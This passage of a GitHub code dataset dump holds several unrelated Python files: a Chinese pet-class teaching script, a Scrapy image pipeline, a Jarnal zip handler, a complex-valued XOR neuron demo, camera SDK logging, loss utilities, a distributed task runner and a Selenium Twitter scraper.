#子类继承上面的父类,当然可以继承父类的属性和方法,当我们在调用时,还需用到另一条咒语:super()\n #在子类的基础上,我们可以添加一些独特的属性和方法\n self.size = \"大型\"\n self.strength = \"强大\"\n self.speed = \"飞快\"\n self.tech = tech\n def magic_transform(self):\n #这是一个简单的用来换技能的函数咒语,它会根据宠物的等级来判断是否可以进行技能转换\n if self.tech == \"技能1\":\n if self.degree <= 4:\n print(\"技能转换失败\")\n print(f\"宠物{self.name}的等级是{self.degree},需要达到5级才能转换\")\n else:\n print(\"技能转换成功\")\n self.tech = \"技能2\"\n print(\"技能转换成功\")\n elif self.tech == \"技能2\":\n self.tech = \"技能1\"\n print(\"技能转换成功\")\n def use_tech(self):\n #当然,既然我们创建的是魔幻宠物,那就得有些其他的的普通宠物没有的特点,\n # 比如,它可以用技能,这是一个用来使用技能的函数咒语,在里边判断宠物所持有的技能\n # 然后根据技能的效果来进行相应的操作\n if self.tech == \"技能1\":\n print(\"技能1使用成功\")\n if self.physicalCondition == \"饥饿的\" or self.mentalCondition == \"疲劳的\":\n print(f\"你的宠物{self.name}向前喷射了一小团小小的火焰,\")\n else:\n print(f\"你的宠物{self.name}向前喷射了一团巨大的火焰\")\n self.physicalCondition = \"饥饿的\"\n self.mentalCondition = \"疲劳的\"\n self.upgrade_pet()\n elif self.tech == \"技能2\":\n print(\"技能2使用成功\")\n if self.physicalCondition == \"饥饿的\" or self.mentalCondition == \"疲劳的\":\n print(f\"你的宠物{self.name}向前刮起了一阵人畜无害的微风\")\n self.upgrade_pet()\n else:\n print(f\"你的宠物{self.name}将会向前刮起一阵毁灭性的龙卷风\")\n choice = input(\"你要继续使用技能吗?(y/n)\")\n if choice == \"y\":\n print(f\"你的宠物{self.name}向前刮起了一阵毁灭性的龙卷风\")\n print(\"很好,在一流魔法师店长的及时的救助下,魔法宠物店有幸没有化为废墟\")\n print(\"所谓大难不死必有后福,在使用了这一强力技能后,你的宠物获得了大量经验\")\n for i in range(10):\n self.upgrade_pet()\n print(f\"现在你的宠物{self.name}的等级是{self.degree}\")\n elif choice == \"n\":\n print(\"你选择了不使用技能\")\n else:\n print(\"你输入了错误的选项,请在“n,y”中选一\")\n\n def show_func(self):\n print(\"我是一个大型的火焰龙,我有着强大的力量,我飞快地移动\")\n print(f\"现在我能使用的技能是{self.tech}\")\nclass Unicorn(MyMagicPet):\n def __init__(self, name, age, gender, color,tech):\n super().__init__(name, age, gender, color)\n self.size = \"中型\"\n self.strength = \"壮实\"\n self.speed = \"飞速\"\n self.tech = tech\n def show_func(self):\n print(\"我是一个中型的独角兽,我有着强大的力量,我飞速地移动\")\n\n#在完成上述的类的定义和继承后,我们就做足施展魔法的准备了,下面请尽情施展魔法吧!\n#比如创建一个Dragon类的对象怎么样?\n\n#比如对它进行操作怎么样?\n\n#比如对它进行升级怎么样?\n\n#再比如,做些更厉害的事,去发挥想象力去补充下独角兽类?\n\n#勇敢地去试试吧!\n\n","repo_name":"hzt200306/pythonProjectsDevelopment","sub_path":"python/06_lzt_MyMagicPet/魔法宠物程序制作.py","file_name":"魔法宠物程序制作.py","file_ext":"py","file_size_in_byte":9907,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"10603534739","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html\nimport scrapy\nfrom scrapy.pipelines.images import ImagesPipeline\nfrom scrapy.exceptions import DropItem\nimport re\n\nclass MzituPipeline(ImagesPipeline):\n def file_path(self, request, response=None, info=None):\n item = request.meta['item']\n folder = item['name']\n folder_strip = strip(folder)\n image_guid = request.url.split('/')[-1]\n filename = u'{0}/{1}'.format(folder_strip, image_guid) # 路径 只是生成路径\n return filename\n\n\n # 固定写法 多加一个referer 保存图片\n def get_media_requests(self, item, info):\n for img_url in item['image_urls']:\n referer = item['url']\n yield scrapy.Request(img_url, meta={'item': item,\n 'referer': referer})\n\n def item_completed(self, results, item, info):\n image_paths = [x['path'] for ok, x in results if ok]\n if not image_paths:\n raise DropItem(\"Item contains no images\")\n return item\n\n\ndef strip(path):\n path = re.sub(r'[?\\\\*|“<>:/]', '', str(path))\n return path\n\n\nif __name__ == \"__main__\":\n a = '我是一个?\\*|“<>:/错误的字符串'\n print(strip(a))","repo_name":"pol9111/mzitu","sub_path":"mzitu/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"18689610220","text":"import os, sys\nimport zipfile\n\ndef statlog(s):\n print(\" -- %s\" % s)\n \nclass JAJFile:\n def __init__(self, jaj_filepath):\n if not zipfile.is_zipfile(jaj_filepath):\n raise Exception(\"I need a zipfile\")\n \n self.filepath = jaj_filepath\n self.filename = os.path.split(jaj_filepath)[0]\n self.zf = zipfile.ZipFile(jaj_filepath, 'r')\n\n self.background_pdf_filename = None\n self.background_pdf_filepath = None\n self.dc_svg_annotation = {}\n self.ls_extract = []\n self.dir_tmp = None\n\n for info in self.zf.infolist():\n if info.filename.startswith(\"background\") and info.filename.endswith(\".pdf\"):\n self.background_pdf_filename = info.filename\n self.ls_extract.append(info.filename)\n # jarnal annotations have format \"p%d.svg\" and start from 0\n if info.filename.startswith('p') and info.filename.endswith('.svg'):\n svg_page_num = int(os.path.splitext(info.filename[1:])[0])\n # cache the svgs in the annotation directory\n self.dc_svg_annotation[svg_page_num] = info.filename\n self.ls_extract.append(info.filename)\n \n if self.background_pdf_filename is None:\n raise Exception(\"did not did not find any pdfs in the jaj\")\n \n def extract_to_directory(self, output_directory):\n if not os.path.exists(output_directory):\n os.mkdir(output_directory)\n self.dir_tmp = output_directory\n for filename in self.ls_extract:\n extract_path = os.path.join(output_directory, filename)\n open(extract_path, 'wb').write(self.zf.read(filename))\n #statlog('extracted %s' % filename)\n\n self.background_pdf_filepath = os.path.join(output_directory, self.background_pdf_filename)\n \n def cleanup(self):\n if not self.dir_tmp: return\n for filename in self.ls_extract:\n print(\"~ jaj %s\" % filename)\n os.unlink(os.path.join(self.dir_tmp, filename))\n os.rmdir(self.dir_tmp)\n \n # old stuff from another class that did something similar, possibly\n # redundant. shoehorned to fit here, may not work\n def deflate(self):\n if not self.dir_tmp:\n self.dir_tmp = \"%s.dir\" % self.filename\n CWD = os.getcwd()\n os.mkdir(self.dir_tmp)\n os.chdir(self.dir_tmp)\n \n # extract into dir_tmp\n for info in self.zf.infolist():\n with open(info.filename, \"w\") as ofile:\n ofile.write(self.zf.read(info.filename))\n\n os.chdir(CWD)\n \n def inflate(self, remove_temp = True):\n if not self.dir_tmp:\n self.deflate()\n\n CWD = os.getcwd()\n os.chdir(self.dir_tmp)\n\n ls_archive_file = os.listdir('.')\n print(\"creating archive...\")\n zofile = zipfile.ZipFile(self.filename, mode='w')\n try:\n for filename in ls_archive_file:\n zofile.write(filename)\n finally:\n print(\"archive successfully created\")\n zofile.close()\n\n os.chdir(CWD)\n \n if remove_temp:\n os.rename(os.path.join(self.dir_tmp, self.filename), os.path.join(CWD, self.filename))\n shutil.rmtree(self.dir_tmp)\n self.dir_tmp = None\n \n\n","repo_name":"whacked/BeanBunny","sub_path":"BeanBunny/io/JarnalFile.py","file_name":"JarnalFile.py","file_ext":"py","file_size_in_byte":3376,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"70732230567","text":"# simple neuron using complex numbers for weights and input\n# to learn the XOR problem, must use 2 periods, ie, dividing the circle into 2 sections so opposite angles have the same category\n# The ideas are based from the link below, which I modified based on my understanding of how the neuron behaves\n# I've extended this to include visualization of the neural activity\n# https://github.com/makeyourownneuralnetwork/complex_valued_neuralnetwork/blob/master/single_neuron-periodic.ipynb\n# http://makeyourownneuralnetwork.blogspot.com/2016/05/complex-valued-neural-networks.html\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport numpy as np\nimport math\nimport copy\n\n# initialize visualization\nfig, ax = plt.subplots(figsize=(8, 5), subplot_kw=dict(aspect=\"equal\", adjustable='datalim', anchor='C'))\n# ax.set_xlim((-4,4))\n# ax.set_ylim((-4,4))\nfig.set_dpi(100)\nclass ComplexNeuron():\n def __init__(self, inputn, cat, periods):\n self.input_num = inputn\n self.categories = cat\n self.periods = periods\n self.tc_passed = 0\n\n # link weights matrix\n self.w = np.random.normal(0.0, 1.0, (inputn + 1))\n self.w = np.array(self.w, ndmin=2, dtype='complex128')\n self.w += 1j * np.random.normal(0.0, 1.0, (inputn + 1))\n print ('Weights: ', self.w)\n self.out = {}\n self.map_out()\n print ('Out Mapping: ',self.out)\n\n def map_out(self):\n sections = self.categories * self.periods\n angle = 2 * np.pi / sections\n h_angle = angle / 2\n # angle + π to get the oposite angle\n for i in range(1, self.categories+1):\n out_dict = {}\n o_angle = angle * i\n t_angle = o_angle - h_angle\n\n out_dict['angle'] = [o_angle]\n out_dict['target'] = [t_angle]\n if self.periods == 2:\n for j in range(1, self.periods):\n out_dict['angle'].append(o_angle + np.pi)\n out_dict['target'].append(t_angle + np.pi)\n\n self.out[i-1] = out_dict\n self.out[i-1] = out_dict\n\n # create Pie to represent neuron\n data = np.ones(4)\n labels = ['False', 'True'] * 2\n patches, texts, autotexts = ax.pie(data, autopct=lambda pct: int(pct * sum(data)/100), \n labels=labels, textprops=dict(color=\"w\"))\n \n # set Pie legends Title and loc\n ax.legend(patches, labels,\n title=\"Truth Values\",\n loc=\"center left\",\n bbox_to_anchor=(0.8, 0, 0.5, 1))\n\n # Set Legends color and Texts\n legnds = ax.get_legend()\n for i in range(sections):\n patches[i-1].set_alpha(0.7)\n if i%2 == 0:\n autotexts[i].set_text('0')\n patches[i].set_color('#0cff0c')\n legnds.legendHandles[i].set_color('#0cff0c')\n else:\n patches[i].set_color('#0165fc')\n legnds.legendHandles[i].set_color('#0165fc')\n\n ax.set_title(\"Single Neuron:\\nSolving XOR Problem\")\n plt.setp(autotexts, size=8, weight=\"bold\")\n \n def map_z(self, z):\n z = np.angle(z)\n while z < 0:\n z += 2 * np.pi\n\n print ('Angle: ', z)\n for i in range(self.periods):\n for j in range(self.categories):\n if z < self.out[j]['angle'][i]:\n return j, i\n\n def query(self, in_list, visual=False):\n print ('++++++++++++++++ Q U E R Y ++++++++++++++++')\n in_arr = copy.deepcopy(in_list)\n in_arr.append(1.0)\n input = np.array(in_arr, ndmin=2, dtype='complex128')\n print ('Input: ',input)\n z = np.dot(input, self.w.T)[0]\n print ('Z: ',z)\n o, q = self.map_z(z)\n print ('Output: ',o)\n return z, (o, q)\n \n def train(self, in_list, target, visual=False):\n print ('++++++++++++++++ T R A I N ++++++++++++++++')\n in_arr = copy.deepcopy(in_list)\n in_arr.append(1.0)\n input = np.array(in_arr, ndmin=2, dtype='complex128')\n print ('Input: ',input)\n z = np.dot(input, self.w.T)[0]\n print ('Z: ',z)\n o, q = self.map_z(z)\n print ('Output: ',o)\n # if o == target:\n # self.tc_passed += 1\n # return z\n\n print ('Modify weights!')\n t_angle = np.array(self.out[target]['target'])\n print ('Target Angles: ', t_angle)\n #t_angle_2complex = complex(np.cos(t_angle) + 1j*np.sin(t_angle))\n\n errors = np.exp(1j * t_angle) - z\n #print ('Errors: ', errors)\n e = errors[np.argmin(np.abs(errors))]\n print ('Error: ', e)\n dw = e * input / 3\n self.w += dw\n print ('Weights: ',self.w)\n \n #query after weight adjustment\n # z1, _ = self.query(in_list[:2])\n # o1, _ = self.map_z(z1)\n # if o1 == target:\n # self.tc_passed += 1\n \n return z, (o, q)\n \n def reset_tc_passed(self):\n self.tc_passed = 0\n\ndef visualize(angle, q, offset=1):\n x = np.cos(angle)\n y = np.sin(angle)\n #ax.scatter(x,y, facecolor='red')\n # xtxt = -1.7\n # ytxt = 1.2 * offset\n xtxt = 0\n ytxt = 0\n offset *= 0.25\n if q[1] == 1: # bottom half of circle\n ytxt = y - offset\n if q[0] == 0:\n xtxt = x - offset\n else:\n xtxt = x + offset\n else: # top half of circle\n ytxt = y + offset\n if q[0] == 1:\n xtxt = x - (offset + 0.25)\n else:\n xtxt = x + offset\n return (x,y), (xtxt, ytxt)\n\n# Initialize neural network\nn_in = 2\ncat = 2\nper = 2\nnn = ComplexNeuron(n_in, cat, per)\n\n# define arrow annotations for raw and learned angle\narrowprops = dict(arrowstyle=\"-|>\",\n color='black',\n shrinkA=5, shrinkB=5,\n patchA=None,\n patchB=None,\n connectionstyle=\"angle,angleA=-90,angleB=180,rad=5\",\n )\nraw_angle = plt.annotate('', xy=(0,0))\nlearned_angle = plt.annotate('', xy=(0,0))\n\n# define Input Texts and Input Data\nbbox = dict(boxstyle=\"square\", fc='w', ec='black')\ntxt_handler = [\n plt.text(-2, 0.6, \"Training Data:\", weight=\"semibold\", size='large'),\n plt.text(-1.8, 0.35, '', bbox=bbox, weight=\"semibold\", size='xx-large', family='monospace'),\n plt.text(-1.8, 0, '', bbox=bbox, weight=\"semibold\", size='xx-large', family='monospace'),\n plt.text(-2, -0.4, \"Target Output:\", weight=\"semibold\", size='large'),\n plt.text(-1.8, -0.65, '', bbox=bbox, weight=\"semibold\", size='xx-large', family='monospace')]\n\nTrain_d = [\n ['Train',[-1, -1], 0],\n ['Train',[-1, 1], 1],\n ['Train',[ 1, -1], 1],\n ['Train',[ 1, 1], 0],\n ['Query',[-1, -1]],\n ['Query',[-1, 1]],\n ['Query',[ 1, -1]],\n ['Query',[ 1, 1]]\n]\ncnt = 0\nt_len = len(Train_d)\ntest = False\nlearned_point, = ax.plot([], [], 'ro')\nraw_point, = ax.plot([], [], 'ro')\ndef updatefig(data):\n global txt_handler, nn, Train_d, cnt, t_len, raw_angle, learned_angle, test, arrowprops, learned_point, raw_point\n bbox = dict(boxstyle=\"square\", fc='w', ec='black')\n bbox_r = dict(boxstyle=\"square\", fc='red', ec='black')\n bbox_g = dict(boxstyle=\"square\", fc='green', ec='black')\n\n if Train_d[cnt][0] == 'Train':\n if test:\n print ('Data: ', Train_d[cnt][1])\n z, q = nn.query(Train_d[cnt][1])\n xy, xytxt = visualize(np.angle(z), q)\n # set and show learned angle and point\n learned_point.set_data(xy)\n learned_point.set_visible(True)\n learned_angle = plt.annotate('Learned Angle', xy=xy, xytext=xytxt,\n bbox=dict(boxstyle=\"round\", fc='gold'), arrowprops=arrowprops)\n\n txt_handler[4].set_text(q[0])\n if q[0] != Train_d[cnt][2]:\n txt_handler[4].set_bbox(bbox_r)\n else:\n txt_handler[4].set_bbox(bbox_g)\n\n test = False\n\n cnt += 1\n if cnt == t_len:\n cnt = 4\n\n return [*txt_handler, learned_angle , raw_angle, learned_point, raw_point]\n else:\n z, q = nn.train(Train_d[cnt][1], Train_d[cnt][2])\n xy, xytxt = visualize(np.angle(z), q, -1.2)\n # set raw angle and point\n raw_point.set_data(xy)\n raw_point.set_visible(True)\n raw_angle = plt.annotate('Raw Angle', xy=xy, xytext=xytxt,\n bbox=dict(boxstyle=\"round\", fc='gray'), arrowprops=arrowprops)\n \n # set input texts\n txt_handler[0].set_text('Training Data')\n txt_handler[3].set_text('Target Output')\n txt_handler[1].set_text(Train_d[cnt][1][0])\n txt_handler[2].set_text(Train_d[cnt][1][1])\n txt_handler[4].set_text(q[0])\n if q[0] != Train_d[cnt][2]:\n txt_handler[4].set_bbox(bbox_r)\n else:\n txt_handler[4].set_bbox(bbox_g)\n\n # hide learned angle and point\n learned_angle.remove()\n learned_point.set_visible(False)\n test = True\n\n return [*txt_handler, raw_angle, learned_point, raw_point]\n else:\n z, q = nn.query(Train_d[cnt][1])\n xy, xytxt = visualize(np.angle(z), q)\n # set learned angle\n learned_point.set_data(xy)\n learned_point.set_visible(True)\n learned_angle = plt.annotate('Learned Angle', xy=xy, xytext=xytxt,\n bbox=dict(boxstyle=\"round\", fc='gold'), arrowprops=arrowprops)\n\n # set input texts\n txt_handler[0].set_text('After Training')\n txt_handler[3].set_text('Learned Output')\n txt_handler[1].set_text(Train_d[cnt][1][0])\n txt_handler[2].set_text(Train_d[cnt][1][1])\n txt_handler[4].set_text(q[0])\n txt_handler[4].set_bbox(bbox)\n \n # hide raw angle\n raw_angle.set_visible(False)\n raw_point.set_visible(False)\n\n cnt += 1\n if cnt == t_len:\n cnt = 4\n \n return [*txt_handler, learned_angle, learned_point, raw_point]\n\nani = animation.FuncAnimation(fig, updatefig, interval=3000, blit=True, repeat=False)\n#ani.save(\"single_neuron.mp4\")\nplt.show()","repo_name":"ey3lock3r/Complex-Valued-NN","sub_path":"complex_neuron_v2.py","file_name":"complex_neuron_v2.py","file_ext":"py","file_size_in_byte":10233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"37079550432","text":"import logging\nimport os\nimport platform\n\nfrom cuvis_il import cuvis_il\nfrom .cuvis_aux import SDKException\nfrom .cuvis_types import ComponentType\n\nimport cuvis.cuvis_types as internal\n\nfrom dataclasses import dataclass\n\nclass General(object):\n def __init__(self, path=\"\"):\n log_path = \".\"\n FORMAT = '%(asctime)s -- %(levelname)s: %(message)s'\n if os.path.exists(path):\n log_path = path + os.sep\n elif platform.system() == \"Linux\":\n log_path = os.path.expanduser('~') + os.sep + \".cuvis\" + os.sep\n if not os.path.exists(log_path):\n os.mkdir(log_path)\n elif platform.system() == \"Windows\":\n log_path = os.getenv('APPDATA') + os.sep + \".cuvis\" + os.sep\n if not os.path.exists(log_path):\n os.mkdir(log_path)\n \n if os.path.exists(log_path):\n logging.basicConfig(filename=log_path + \"cuvisSDK_python.log\",\n format=FORMAT,\n encoding='utf-8',\n level=logging.DEBUG,\n filemode='w')\n else:\n raise SDKException(\n \"path {} does not exist...\".format(os.path.abspath(log_path)))\n logging.info(\"Logger ready.\")\n\n if cuvis_il.status_ok != cuvis_il.cuvis_init(log_path):\n raise SDKException()\n pass\n\n @property\n def version(self) -> str:\n return cuvis_il.cuvis_version_swig()\n\n def set_log_level(self, lvl):\n lvl_dict = {\"info\": {\"cuvis\": cuvis_il.loglevel_info,\n \"logging\": logging.INFO},\n \"debug\": {\"cuvis\": cuvis_il.loglevel_debug,\n \"logging\": logging.DEBUG},\n \"error\": {\"cuvis\": cuvis_il.loglevel_error,\n \"logging\": logging.ERROR},\n \"fatal\": {\"cuvis\": cuvis_il.loglevel_fatal,\n \"logging\": logging.CRITICAL},\n \"warning\": {\"cuvis\": cuvis_il.loglevel_warning,\n \"logging\": logging.WARNING},\n }\n\n cuvis_il.cuvis_set_log_level(lvl_dict[lvl][\"cuvis\"])\n logging.basicConfig(level=lvl_dict[lvl][\"logging\"])\n\n\n@dataclass\nclass ComponentInfo(object):\n type: ComponentType = None\n display_name: str = None\n sensor_info: str = None\n user_field: str = None\n pixel_format: str = None\n\n def _get_internal(self):\n ci = cuvis_il.cuvis_component_info_t()\n ci.type = internal.__CuvisComponentType__[self.type]\n ci.displayname = self.display_name\n ci.sensorinfo = self.sensor_info\n ci.userfield = self.user_field\n ci.pixelformat = self.pixel_format\n return ci\n \n @classmethod\n def _from_internal(cls, ci):\n return cls(type=internal.__ComponentType__[ci.type],\n display_name=ci.displayname,\n sensor_info=ci.sensorinfo,\n user_field=ci.userfield,\n pixel_format=ci.pixelformat)\n","repo_name":"cubert-hyperspectral/cuvis.python","sub_path":"cuvis/General.py","file_name":"General.py","file_ext":"py","file_size_in_byte":3118,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"39268298588","text":"import logging as log\nimport torch\nfrom torch import nn\n\nfrom torch.nn import functional as F\n\n\ndef get_irreducable_losses_complete(dataloader, small_model):\n log.info('Calculating irreducible losses')\n irr_losses = []\n with torch.inference_mode():\n for idx, (data, target) in enumerate(dataloader):\n irr_losses.append(compute_irreducable_loss_batch(data, target, small_model))\n return irr_losses\n\n\ndef compute_irreducable_loss_batch(data, target, small_model):\n output = small_model(data)\n if str(type(output)) == \"\":\n output = output.logits\n return F.cross_entropy(\n output, target, reduction=\"none\"\n )\n\n\ndef compute_reducable_loss_batch(large_model: nn.Module, small_model: nn.Module, data, target):\n with torch.inference_mode():\n logits = large_model(data)\n if str(type(logits)) == \"\":\n logits = logits.logits\n model_loss = F.cross_entropy(logits, target, reduction=\"none\")\n irreducible_loss = compute_irreducable_loss_batch(data, target, small_model)\n reducible_loss = model_loss - irreducible_loss\n\n return model_loss, reducible_loss\n","repo_name":"TNJKvm/stood-over-june","sub_path":"src/utils/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"34594477388","text":"\"\"\"\ntasq.remote.runner.py\n~~~~~~~~~~~~~~~~~~~~~\nRunner process, listening for incoming connections to schedule tasks to a pool\nof worker actors\n\"\"\"\nimport os\nimport asyncio\nfrom multiprocessing import Process, cpu_count\n\nimport tasq.worker as worker\nimport tasq.actors as actors\nfrom .backend import ZMQBackend\nfrom .connection import connect_redis_backend, connect_rabbitmq_backend\nfrom ..logger import get_logger\n\n\ndef max_workers():\n return (cpu_count() * 2) + 1\n\n\nclass Runner:\n def __init__(self, backend, worker_factory, unpickle=True, signkey=None):\n # Send digital signed data\n self._signkey = signkey\n self._backend = backend\n self._workers = worker_factory()\n self._run = False\n self._unpickle = unpickle\n self._log = get_logger(f\"{__name__}-{os.getpid()}\")\n\n def _respond(self, fut):\n self._backend.send_result(fut.result())\n\n def stop(self):\n \"\"\"Stops the loop after canceling all remaining tasks\"\"\"\n self._log.info(\"Stopping..\")\n # Stop server connection\n self._run = False\n self._backend.stop()\n\n def start(self):\n \"\"\"Blocking function, schedule the execution of the coroutine waiting\n for incoming tasks and run the asyncio loop forever\n \"\"\"\n self._run = True\n self._log.debug(\"Listening on %s\", self._backend)\n self.run()\n\n def run(self):\n while self._run:\n job = self._backend.recv(5, unpickle=self._unpickle)\n if not job:\n continue\n self._log.debug(\"Received job: %s\", job)\n fut = self._workers.route(job)\n fut.add_done_callback(self._respond)\n\n\nclass ZMQRunner:\n \"\"\"Runner process, handle requests asynchronously from clients and\n delegate processing of incoming tasks to worker processes, responses are\n sent back to clients by using a dedicated thread\n \"\"\"\n\n def __init__(self, backend, worker_factory, unpickle=True, signkey=None):\n # Send digital signed data\n self._signkey = signkey\n self._backend = backend\n self._workers = worker_factory()\n self._unpickle = unpickle\n self._run = False\n self._log = get_logger(f\"{__name__}-{os.getpid()}\")\n self._loop = asyncio.get_event_loop()\n\n def stop(self):\n \"\"\"Stops the loop after canceling all remaining tasks\"\"\"\n self._log.info(\"Stopping..\")\n self._run = False\n # Cancel pending tasks (opt)\n for task in asyncio.Task.all_tasks():\n task.cancel()\n self._loop.stop()\n self._loop.close()\n # Stop server connection\n self._backend.stop()\n\n def start(self):\n \"\"\"Blocking function, schedule the execution of the coroutine waiting\n for incoming tasks and run the asyncio loop forever\n \"\"\"\n self._backend.bind()\n self._run = True\n self._log.info(self._backend)\n self._loop.create_task(self.run())\n self._loop.run_forever()\n\n async def run(self):\n while self._run:\n try:\n if await self._backend.poll():\n job = await self._backend.recv(unpickle=self._unpickle)\n self._log.debug(\"Received job: %s\", job)\n f = self._workers.route(job)\n fut = asyncio.wrap_future(f)\n await self._backend.send(await fut)\n except asyncio.CancelledError:\n pass\n\n\nclass Runners:\n\n \"\"\"Class to handle a pool of runners on the same node\"\"\"\n\n def __init__(self, binds, signkey=None, unix_socket=False):\n # List of tuples (host, pport, pull_port) to bind to\n self._binds = binds\n # Digital sign data before send an receive it\n self._signkey = signkey\n # Unix socket flag, if set to true, unix sockets for interprocess\n # communication will be used and ports will be used to differentiate\n # push and pull channel\n self._unix_socket = unix_socket\n # Processes, equals the len of `binds`\n self._procs = []\n self._init_binds()\n\n def _serve_runner(self, host, psh_port, pl_port):\n pass\n # m = ZMQActorRunner(\n # host,\n # psh_port,\n # pl_port,\n # signkey=self._signkey,\n # unix_socket=self._unix_socket,\n # )\n # m.start()\n\n def _init_binds(self):\n self._procs = [\n Process(target=self._serve_runner, args=(host, psh_port, pl_port,))\n for host, psh_port, pl_port in self._binds\n ]\n\n def start_procs(self):\n for proc in self._procs:\n proc.start()\n try:\n for proc in self._procs:\n proc.join()\n except KeyboardInterrupt:\n # Clean up should be placed\n pass\n\n\nclass RunnerFactory:\n def __init__(self):\n self._builders = {}\n\n def register_builder(self, key, builder):\n self._builders[key] = builder\n\n def create(self, key, **kwargs):\n builder = self._builders.get(key)\n if not builder:\n raise ValueError(key)\n return builder(**kwargs)\n\n\ndef build_zmq_actor_runner(\n host,\n channel,\n router_class=actors.RoundRobinRouter,\n num_workers=max_workers(),\n signkey=None,\n unix=False,\n unpickle=True,\n):\n push, pull = channel\n ctx = actors.get_actorsystem(f\"{host}:({push}, {pull})\")\n server = ZMQBackend(host, push, pull, signkey, unix)\n return ZMQRunner(\n server,\n lambda: worker.build_worker_actor_router(\n router_class, num_workers, ctx\n ),\n unpickle,\n signkey,\n )\n\n\ndef build_zmq_queue_runner(\n host,\n channel,\n num_workers=max_workers(),\n signkey=None,\n unix=False,\n unpickle=False,\n):\n push, pull = channel\n server = ZMQBackend(host, push, pull, signkey, unix)\n return ZMQRunner(\n server, lambda: worker.build_jobqueue(num_workers), unpickle, signkey\n )\n\n\ndef build_redis_actor_runner(\n host,\n port,\n db,\n name,\n namespace=\"queue\",\n num_workers=max_workers(),\n router_class=actors.RoundRobinRouter,\n signkey=None,\n):\n ctx = actors.get_actorsystem(\"\")\n server = connect_redis_backend(\n host, port, db, name, namespace, signkey=signkey\n )\n return Runner(\n server,\n lambda: worker.build_worker_actor_router(\n router_class, num_workers, ctx\n ),\n signkey=signkey,\n )\n\n\ndef build_redis_queue_runner(\n host,\n port,\n db,\n name,\n namespace=\"queue\",\n num_workers=max_workers(),\n signkey=None,\n):\n server = connect_redis_backend(\n host, port, db, name, namespace, signkey=signkey\n )\n return Runner(\n server, lambda: worker.build_jobqueue(num_workers), False, signkey\n )\n\n\ndef build_rabbitmq_actor_runner(\n host,\n port,\n role,\n name,\n namespace=\"queue\",\n num_workers=max_workers(),\n router_class=actors.RoundRobinRouter,\n signkey=None,\n):\n ctx = actors.get_actorsystem(\"\")\n server = connect_rabbitmq_backend(\n host, port, role, name, namespace, signkey=signkey\n )\n return Runner(\n server,\n lambda: worker.build_worker_actor_router(\n router_class, num_workers, ctx\n ),\n signkey=signkey,\n )\n\n\ndef build_rabbitmq_queue_runner(\n host,\n port,\n role,\n name,\n namespace=\"queue\",\n num_workers=max_workers(),\n signkey=None,\n):\n server = connect_rabbitmq_backend(\n host, port, role, name, namespace, signkey=signkey\n )\n return Runner(\n server, lambda: worker.build_jobqueue(num_workers), False, signkey\n )\n\n\nrunner_factory = RunnerFactory()\nrunner_factory.register_builder(\"ZMQ_ACTOR_RUNNER\", build_zmq_actor_runner)\nrunner_factory.register_builder(\"ZMQ_QUEUE_RUNNER\", build_zmq_queue_runner)\nrunner_factory.register_builder(\"REDIS_QUEUE_RUNNER\", build_redis_queue_runner)\nrunner_factory.register_builder(\"REDIS_ACTOR_RUNNER\", build_redis_actor_runner)\nrunner_factory.register_builder(\n \"AMQP_QUEUE_RUNNER\", build_rabbitmq_queue_runner\n)\nrunner_factory.register_builder(\n \"AMQP_ACTOR_RUNNER\", build_rabbitmq_actor_runner\n)\n","repo_name":"codepr/tasq","sub_path":"tasq/remote/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":8243,"program_lang":"python","lang":"en","doc_type":"code","stars":88,"dataset":"github-code","pt":"53"}
+{"seq_id":"7073235269","text":"from bs4 import BeautifulSoup\nfrom selenium import webdriver\nimport urllib.parse\nimport datetime as dt\n\"\"\"\nneeds.py는 키워드를 선택, url검색, 키워드 검색 시 날짜구분에 이용됨\n\"\"\"\nimport os\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"DBP.settings\")\nimport django\ndjango.setup()\nfrom App.models import Data\n\nclass TwitterCrawling():\n keyword = \"\"\n\n def __init__(self):\n self.url1 = \"https://twitter.com/search?f=tweets&vertical=default&q=\"\n #self.url2 = urllib.parse.quote_plus(\", \".join(self.keyword))\n self.s_date = dt.date(year=2018, month=11, day=30)\n self.e_date = dt.date(year=2018, month=12, day=1)\n\n def InputKeyword(self, word):\n print(\"트위터에서 검색될 키워드 : \")\n self.keyword = word\n print(\"\\\"\" + self.keyword + \"\\\"\")\n return self.connect_chrome()\n\n def connect_chrome(self):\n print(\"Connecting chrome to tweet !\")\n self.url = str(self.url1 + self.keyword)\n\n # 드라이버 연결(Chrome)\n self.driver = webdriver.Chrome('C:/Users/User/Desktop/chromedriver.exe')\n # 암묵적으로 웹 자원 로드를 위해 2초까지 기다린다\n self.driver.implicitly_wait(2)\n\n # BeautifulSoup를 이용한 html 스크래핑\n self.driver.get(self.url + '%20since%3A' + str(self.s_date) + '%20until%3A' + str(self.e_date) + '&amp;amp;amp;amp;lang=ko')\n self.html = self.driver.page_source\n self.soup = BeautifulSoup(self.html, 'html.parser')\n\n return self.parse_twitter_text()\n\n def parse_twitter_text(self):\n print(\"Parsing tweet text !(max = 20)\")\n # 내용 파싱(추출)\n lists = self.soup.find_all(\"p\", {\"class\": \"TweetTextSize\"})\n data_title = {}\n\n # 보여짐\n for i in lists:\n data_title[i.text] = i.text\n self.driver.quit()\n return data_title\n","repo_name":"JinMinChoi/DB_Project","sub_path":"DBP/first_tweet_new.py","file_name":"first_tweet_new.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
